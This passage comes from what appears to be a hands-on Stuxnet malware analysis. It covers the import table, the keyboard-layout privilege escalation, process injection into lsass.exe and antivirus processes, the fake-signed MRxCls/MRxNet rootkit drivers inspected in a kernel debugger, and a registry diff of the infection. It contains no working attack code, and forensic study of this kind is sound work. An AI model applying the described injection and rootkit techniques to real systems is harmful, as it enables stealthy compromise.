0100122C .text Import ( USER32.GetDlgCtrlID
01001274 .text Import ( USER32.GetDlgItem
01001284 .text Import ( USER32.GetDlgItemTextW
01001124 .text Import ( KERNEL32.GetFileAttributesW
010010B0 .text Import ( KERNEL32.GetFileInformationByHandle
010012D4 .text Import ( comdlg32.GetFileTitleW
010011E8 .text Import ( USER32.GetFocus
010011B4 .text Import ( USER32.GetForegroundWindow
010011A0 .text Import ( USER32.GetKeyboardLayout
01001138 .text Import ( KERNEL32.GetLastError
010010D8 .text Import ( KERNEL32.GetLocaleInfoW
01001098 .text Import ( KERNEL32.GetLocalTime
01001320 .text Import msvcrt.__getmainargs
01001264 .text Import ( USER32.GetMenu
01001258 .text Import ( USER32.GetMenuState
010012A8 .text Import ( USER32.GetMessageW
010010CC .text Import ( KERNEL32.GetModuleHandleA
0100105C .text Import ( GDI32.GetObjectW
010012D8 .text Import ( comdlg32.GetOpenFileNameW
0100128C .text Import ( USER32.GetParent
010012B4 .text Import WINSPOOL.GetPrinterDriverW
01001110 .text Import ( KERNEL32.GetProcAddress
010012E4 .text Import ( comdlg32.GetSaveFileNameW
010010D0 .text Import ( KERNEL32.GetStartupInfoA
01001058 .text Import ( GDI32.GetStockObject
01001260 .text Import ( USER32.GetSubMenu
010011CC .text Import ( USER32.GetSystemMenu
0100121C .text Import ( USER32.GetSystemMetrics
010010B8 .text Import ( KERNEL32.GetSystemTimeAsFileTime
0100103C .text Import ( GDI32.GetTextExtentPoint32W
01001048 .text Import ( GDI32.GetTextFaceW
0100106C .text Import ( GDI32.GetTextMetricsW
01001090 .text Import ( KERNEL32.GetTickCount
010010A4 .text Import KERNEL32.GetTimeFormatW
0100109C .text Import ( KERNEL32.GetUserDefaultLCID
01001150 .text Import KERNEL32.GetUserDefaultUILanguage
01001270 .text Import ( USER32.GetWindowLongW
010011BC .text Import ( USER32.GetWindowPlacement
01001218 .text Import ( USER32.GetWindowTextW
010010D4 .text Import ( KERNEL32.GlobalFree
010010A8 .text Import ( KERNEL32.GlobalLock
010010AC .text Import ( KERNEL32.GlobalUnlock
01001324 .text Import msvcrt._initterm
01001224 .text Import ( USER32.InvalidateRect
01001250 .text Import ( USER32.IsClipboardFormatAvailable
010012A0 .text Import ( USER32.IsDialogMessageW
010011B8 .text Import ( USER32.IsIconic
0100100C .text Import ADVAPI32.IsTextUnicode
01001304 .text Import ( msvcrt.iswctype
010011C8 .text Import ( USER32.LoadAcceleratorsW
010011D8 .text Import ( USER32.LoadCursorW
010011EC .text Import ( USER32.LoadIconW
010011D4 .text Import ( USER32.LoadImageW
010010C8 .text Import ( KERNEL32.LoadLibraryA
010011C4 .text Import ( USER32.LoadStringW
010010E0 .text Import ( KERNEL32.LocalAlloc
010010DC .text Import ( KERNEL32.LocalFree
010010F0 .text Import ( KERNEL32.LocalLock
01001148 .text Import ( KERNEL32.LocalReAlloc
01001134 .text Import ( KERNEL32.LocalSize
010012FC .text Import ( msvcrt.localtime
010010E8 .text Import ( KERNEL32.LocalUnlock
01001074 .text Import ( GDI32.LPtoDP
01001118 .text Import ( KERNEL32.lstrcatW
01001108 .text Import ( KERNEL32.lstrcmpiW
01001128 .text Import ( KERNEL32.lstrcmpW
01001130 .text Import ( KERNEL32.lstrcpynW
010010FC .text Import ( KERNEL32.lstrcpyW
010010E4 .text Import ( KERNEL32.lstrlenW
01001168 .text Import ( KERNEL32.MapViewOfFile
010011AC .text Import ( USER32.MessageBeep
01001268 .text Import ( USER32.MessageBoxW
0100739D .text Export <ModuleEntryPoint>
01001220 .text Import ( USER32.MoveWindow
0100112C .text Import ( KERNEL32.MulDiv
01001164 .text Import ( KERNEL32.MultiByteToWideChar
01001254 .text Import ( USER32.OpenClipboard
010012BC .text Import WINSPOOL.OpenPrinterW
010012C4 .text Import comdlg32.PageSetupDlgW
01001208 .text Import ( USER32.PeekMessageW
010012A4 .text Import ( USER32.PostMessageW
010011F4 .text Import ( USER32.PostQuitMessage
010012CC .text Import comdlg32.PrintDlgExW
01001330 .text Import msvcrt.__p__commode
01001334 .text Import msvcrt.__p__fmode
01001094 .text Import ( KERNEL32.QueryPerformanceCounter
01001100 .text Import ( KERNEL32.ReadFile
01001004 .text Import ( ADVAPI32.RegCloseKey
01001008 .text Import ( ADVAPI32.RegCreateKeyW
010011D0 .text Import ( USER32.RegisterClassExW
010011F8 .text Import ( USER32.RegisterWindowMessageW
01001014 .text Import ( ADVAPI32.RegOpenKeyExA
01001010 .text Import ( ADVAPI32.RegQueryValueExA
01001000 .text Import ( ADVAPI32.RegQueryValueExW
01001018 .text Import ( ADVAPI32.RegSetValueExW
01001190 .text Import ( USER32.ReleaseDC
010012DC .text Import ( comdlg32.ReplaceTextW
01001234 .text Import ( USER32.ScreenToClient
01001084 .text Import ( GDI32.SelectObject
0100123C .text Import ( USER32.SendDlgItemMessageW
01001240 .text Import ( USER32.SendMessageW
01001044 .text Import ( GDI32.SetAbortProc
0100119C .text Import ( USER32.SetActiveWindow
01001070 .text Import ( GDI32.SetBkMode
0100118C .text Import ( USER32.SetCursor
0100127C .text Import ( USER32.SetDlgItemTextW
01001154 .text Import ( KERNEL32.SetEndOfFile
01001278 .text Import ( USER32.SetFocus
01001140 .text Import ( KERNEL32.SetLastError
01001080 .text Import ( GDI32.SetMapMode
01001200 .text Import ( USER32.SetScrollPos
010010C4 .text Import ( KERNEL32.SetUnhandledExceptionFilter
01001328 .text Import msvcrt.__setusermatherr
0100107C .text Import ( GDI32.SetViewportExtEx
01001078 .text Import ( GDI32.SetWindowExtEx
0100126C .text Import ( USER32.SetWindowLongW
010011DC .text Import ( USER32.SetWindowPlacement
010011F0 .text Import ( USER32.SetWindowTextW
010012AC .text Import ( USER32.SetWinEventHook
01001338 .text Import msvcrt.__set_app_type
01001180 .text Import ( SHELL32.ShellAboutW
010011B0 .text Import ( USER32.ShowWindow
01001314 .text Import ( msvcrt._snwprintf
01001050 .text Import ( GDI32.StartDocW
01001038 .text Import ( GDI32.StartPage
010010BC .text Import ( KERNEL32.TerminateProcess
0100104C .text Import ( GDI32.TextOutW
010012F8 .text Import ( msvcrt.time
0100129C .text Import ( USER32.TranslateAcceleratorW
01001298 .text Import ( USER32.TranslateMessage
0100116C .text Import ( KERNEL32.UnhandledExceptionFilter
01001290 .text Import ( USER32.UnhookWinEvent
01001160 .text Import ( KERNEL32.UnmapViewOfFile
010011FC .text Import ( USER32.UpdateWindow
01001310 .text Import ( msvcrt.wcsncmp
01001340 .text Import ( msvcrt.wcsncpy
01001144 .text Import ( KERNEL32.WideCharToMultiByte
01001228 .text Import ( USER32.WinHelpW
0100113C .text Import ( KERNEL32.WriteFile
01001280 .text Import ( USER32.wsprintfW
0100130C .text Import ( msvcrt._wtol
010012EC .text Import msvcrt._XcptFilter

The Import Address Table (IAT) is essentially just a table of jumps. It's used primarily as a lookup table when an application is calling a function in a different module. Compiled programs cannot know the memory locations of the libraries they depend on, therefore an indirect jump (jmp) is required whenever an API call is made. In the above code we can see jumps to functions such as USER32.GetKeyboardLayout, which is a wrapper for the NtUserLoadKeyboardLayoutEx win32k syscall. This is in regards to Stuxnet's keyboard layout vulnerability (CVE-2010-2743), which is one of four exploitative ways used to escalate privileges in order to reach ring 0. I would have loved to set a breakpoint on win32k!NtUserLoadKeyboardLayoutEx and trace the malware as it's extremely interesting, but setting breakpoints is not possible in an LKD session. I would have needed to break in to another physical machine (which I don't have), or set up a host > virtual COM port, which is a bit of a pain. I'll chalk it up to something to do on a rainy day. Call me lazy... I know.

3. Calls LoadLibraryW, which is exported from kernel32.dll, and passes it specially crafted file names as a parameter, such as: KERNEL32.DLL.ASLR.[HEX] or SHELL32.DLL.ASLR.[HEX]. Below we can see an example of a KERNEL32 variant:

4. Calls the desired exported function.
5. Calls the FreeLibrary function to free the loaded library.

New Process Inject

The second method of injection is done through injecting a newly created process, as such:

1. Creates host process.
2. Replaces the process image with the Stuxnet module to execute and with code that will load the module and call a specified export, passing parameters.

There's a few different image names that can be chosen as the host process for the module:

lsass.exe - MSFT system process in charge of enforcing the security policy.
avp.exe - Kaspersky.
mcshield.exe - McAfee VirusScan.
avguard.exe - Avira Personal Edition.
bdagent.exe - Bitdefender Switch Agent.
UmxCfg.exe - eTrust Configuration Engine (HIPS).
fsdfwd.exe - F-Secure.
rtvscan.exe - Symantec Real Time Virus Scan Service.
ccSvchst.exe - Symantec Service Framework.
ekrn.exe - ESET Service Process.
tmproxy.exe - TrendMicro (PC-cillin in Australia and Virus Buster in Japan).

Malware Execution and Infection

First of all, to even successfully execute the malware you need to set your system time to before June 24th, 2012. This is due to the fact that Stuxnet hard-coded a poison pill to fully delete itself on June 24th, 2012. This was most likely done with the original idea in mind that Stuxnet wouldn't escape the nuclear facilities, which would allow time for Stuxnet to be reversed and ultimately defeated. This piece of malware wanted to stay inside nuclear facilities, target Siemens systems, cause large actual damage, spread to cause more damage, and then go ghost. Fortunately, it did happen to escape its intended environment (some even speculate deliberately) and was inevitably reversed and defeated long before its hard-coded deletion date.

First of all, let's take a pre-infected look at the system with Autoruns + Process Explorer: (Ignore the file not found messages)

Note the checked filter options > Verify code signatures + Hide Microsoft entries. Everything looks to be pretty normal, and nothing really out of the ordinary. We can see we have one instance of lsass.exe.

Now let's turn things up a bit by executing the malware, and then comparing our results from pre-infection:

We can see now within Autoruns we have two new services - MRxCls and MRxNet. These are Stuxnet's kernel-mode drivers which enable its rootkit functionality.

One big thing about malware that surfaces to the face of the public media (for whatever reason, we'll assume popularity/intention) is that journalists love to spin it and give awkward buzzwords - Undefeatable, The Most Sophisticated Malware, etc. Was Stuxnet an elaborate piece of code? Yes, absolutely.
Not only was knowledge needed regarding your typical rootkit/Win development, but heavy reverse engineering knowledge regarding Semens software was necessary as well. However, one of Stuxnet's biggest weak points was its immense lack of anti-debugging/reversing techniques. Among a slew of reasons such as zero VM obfuscation, you can literally use the default regedit to find the locations of both MRxCLS and MRxNet. For example: This had led Stuxnet to be something of a joke among some reverse engneers and analysts, even moreso if you believe that it was created by [insert government]. It's hard to imagine [insert government] wouldn't go to any lengths at all to hide its malware, but then again you never really know, right? : ) I'll continue the discussion regarding its kernel-mode functionality a little later as I'd like to swing back to user-mode real quick. I couldn't get Process Explorer to run after infection, as the VM would bugcheck. I have no idea why, and AFAIK Stuxnet doesn't employ anti-debugging against Sysinternals tools by any means, so it was likely a buggy sample. I digress, and used VMmap instead: We can see there's now three instances of lsass.exe, two of which are fake (newly created host processes). So first off, which is our legitmate lsass.exe? Well, 2/3 are the only ones above 1xxx regarding PID, so let's assume the only one not above 1xxx is legitimate: If sort by Protection regarding the tabs, we can see it's mostly Execute/Read which doesn't raise any red flags. Let's assume for the moment this is legitimate and take a look at another one: Uh oh, we can see two instances of memory that was chosen to share from this lsass.exe that has Write permissions in addition to Execute and Read. When a process has all three, it's a huge red flag for a fake/compromised process. In addition, note how the Size>Commited>Total Working Set, etc are equal. We can now at this point determine PID 648 is legitimate, and PID 1812 is fake. 
We can also at this point then assume that PID 1840 is fake as well: Yep! In this case, we have five instances of memory that was chosen to be shared with R/W/E permissions, in addition to ntdll with R/W/E permissions as well. Note the Size>Commited>Total Working Set, etc equals again as well. At this point we can fully determine 1812 and 1840 are our fake lsass.exe instances, and 1840 is in relation to the patching of ntdll. Let's further compare the three images based on their strings: (PID 648 - legit) (PID 1812 - fake #1) Note we have quite the changes here, with the important being "!This program cannot run in DOS mode.". This is the classic MZ exe format used for .exe files within DOS. We can note the ASCII string - 4D. Let's take a look at the bottom of the string list: (PID 1812 - fake #1) We can see a number of functions, such as InternetOpen. We can at this point determine the DLL was successfully injected into this image of lsass.exe. We can of course expect similar results with PID 1840: (PID 1840 - fake #2) We can also see abnormal termination of the NT Kernel, as well as a jmp: Another big red flag of a malformed image. Let's head back to discussing our kernel-mode drivers, MRxCls and MRxNet. As noted above, these two drivers aren't packed whatsoever with a protector nor packer, so inspecting them in-depth is painless: First off, both of these drivers were digitally signed (albeit fake... what a surprise) to fool the user into believing it was a legitmate driver signed off as such by VeriSign. For example: We can see MRxCls was fake-signed by VeriSign which claimed to be from Realtek. Realtek is obviously a legitimate company and releases lots of software/drivers for their products, such as audio, so this would fool a user if they ever questioned the legitimacy of the apparent MRxCls/Net drivers. 
Using SwishDbgExt, let's dump the list of objects:

lkd> !ms_object
Object: \ (Directory)
|------|----------------------|--------------------|-------------------------|
| Hdle | Object Type          | Addr               | Name                    |
|------|----------------------|--------------------|-------------------------|
| 0000 | Directory            | 0xFFFFFFFFE100D748 | ArcName                 |
| 0000 | Device               | 0xFFFFFFFF821C75C0 | Ntfs                    |
| 0000 | Port                 | 0xFFFFFFFFE15EABB8 | SeLsaCommandPort        |
| 0000 | Key                  | 0xFFFFFFFFE1010478 | \REGISTRY               |
| 0000 | Port                 | 0xFFFFFFFFE186B9E8 | ThemeApiPort            |
| 0000 | Port                 | 0xFFFFFFFFE1B05230 | XactSrvLpcPort          |
| 0000 | Directory            | 0xFFFFFFFFE15AA4B8 | NLS                     |
| 0000 | SymbolicLink         | 0xFFFFFFFFE1008748 | DosDevices              |
| 0000 | Port                 | 0xFFFFFFFFE13D4B68 | SeRmCommandPort         |
| 0000 | Port                 | 0xFFFFFFFFE173BA00 | LsaAuthenticationPort   |
| 0000 | Device               | 0xFFFFFFFF82063A90 | Dfs                     |
| 0000 | Event                | 0xFFFFFFFF821EF5C0 |                         |
| 0000 | Directory            | 0xFFFFFFFFE100E838 | Driver                  |

Notice the strange 'Driver' object with a 'Directory' type. Let's take a look:

lkd> !ms_object 0xFFFFFFFFE100E838
Object: Driver (Directory)
|------|----------------------|--------------------|-------------------------|
| Hdle | Object Type          | Addr               | Name                    |
|------|----------------------|--------------------|-------------------------|
| 0000 | Driver               | 0xFFFFFFFF8231ECC0 | \Driver\Beep            |
| 0000 | Driver               | 0xFFFFFFFF821C72C0 | \Driver\NDIS            |
| 0000 | Driver               | 0xFFFFFFFF821D39C0 | \Driver\KSecDD          |
| 0000 | Driver               | 0xFFFFFFFF82198F38 | \Driver\Mouclass        |
| 0000 | Driver               | 0xFFFFFFFF82245410 | \Driver\Raspti          |
| 0000 | Driver               | 0xFFFFFFFF81F18768 | \Driver\es1371          |
...
| 0000 | Driver               | 0xFFFFFFFF81EA2880 | \Driver\MRxCls          |
| 0000 | Driver               | 0xFFFFFFFF821DE4A0 | \Driver\PCnet           |
| 0000 | Driver               | 0xFFFFFFFF81F0FAE8 | \Driver\MRxNet          |

Let's dump the driver object information for MRxNet:

lkd> !drvobj 81f0fae8
Driver object (81f0fae8) is for:
 \Driver\MRxNet
Driver Extension List: (id , addr)

Device Object list:
820ee288  81f10020  81ebac80  82136298
82302298  82339be0  821bb500  821996c0
821bc238  8224a9d0

We can see MRxNet has a lot of device objects, so let's check one:

lkd> !devobj 81ebac80
Device object (81ebac80) is for:
  \Driver\MRxNet DriverObject 81f0fae8
Current Irp 00000000 RefCount 0 Type 00000003 Flags 00000080
DevExt 81ebad38 DevObjExt 81ebad40
ExtensionFlags (0000000000)
AttachedTo (Lower) 821d4450 \FileSystem\Cdfs

Stuxnet creates new device objects and attaches to the device chain for each device object. As we can see, Stuxnet attached to cdfs.sys, which is part of the filesystem, specifically the CD-ROM filesystem driver. Other filesystem drivers it attaches to are ntfs.sys and fastfat.sys. After attaching, Stuxnet manages the driver object, which in turn provides Stuxnet with the ability to successfully intercept IRP requests.

Other than checking regedit, we can also confirm the existence of the MRxCls service within the registry using the !dreg command, which displays formatted registry key information.
Before we do this however, we need to load ntsdexts.dll, or we'll get the following:

lkd> !dreg System\CurrentControlSet\Services
No export dreg found

This is due to the fact that ntsdexts.dll isn't of course loaded in the extension DLL chain list:

lkd> .chain
Extension DLL search Path:
    C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
Extension DLL chain:
    dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
    ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
    exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
    kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll]
    kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll]

After loading it however with .load ntsdexts, we can then see it's in the list:

lkd> .chain
Extension DLL search Path:
    C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
Extension DLL chain:
    ntsdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:08 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll]
    dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
    ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
    exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
    kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll]
    kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010
        [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll]

Let's now run !dreg again with our path to MRxCls:

lkd> !dreg System\CurrentControlSet\Services\MRxCls
Subkey: Enum

There it is, and we can see its subkey is Enum. We can confirm that by looking back at the screenshot of its registry location from earlier.
Here were the overall changes in the registry comparing pre-infection > post-infection:

----------------------------------
Keys deleted: 23
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control
HKLM\SYSTEM\ControlSet001\Services\MRxCls
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum
HKLM\SYSTEM\ControlSet001\Services\MRxNet
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell

----------------------------------
Values deleted: 110
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet"
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Description: "MRXCLS"
HKLM\SYSTEM\ControlSet001\Services\MRxCls\DisplayName: "MRXCLS"
HKLM\SYSTEM\ControlSet001\Services\MRxCls\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Group: "Network"
HKLM\SYSTEM\ControlSet001\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Data: [binary value elided in this copy]
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000"
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Description: "MRXNET"
HKLM\SYSTEM\ControlSet001\Services\MRxNet\DisplayName: "MRXNET"
HKLM\SYSTEM\ControlSet001\Services\MRxNet\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Group: "Network"
HKLM\SYSTEM\ControlSet001\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000"
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Description: "MRXCLS"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\DisplayName: "MRXCLS"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Group: "Network"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Data: [binary value elided in this copy]
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000"
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Description: "MRXNET"
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\DisplayName: "MRXNET"
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Group: "Network"
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys"
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000"
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum\NextInstance: 0x00000001
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY:gvzrqngr.pcy: 04 00 00 00 06 00 00 00 00 54 07 85 81 FE CF 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\ZJ\Ybgf bs Fghkarg\fazj\znyjner.rkr: 04 00 00 00 06 00 00 00 50 13 53 27 90 93 CA 01
HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0: 34 00 31 00 00 00 00 00 2C 3C 8C 70 10 00 73 6E 6D 77 00 00 20 00 03 00 04 00 EF BE 2C 3C 8C 70 2C 3C 8C 70 14 00 00 00 73 00 6E 00 6D 00 77 00 00 00 14 00 00 00
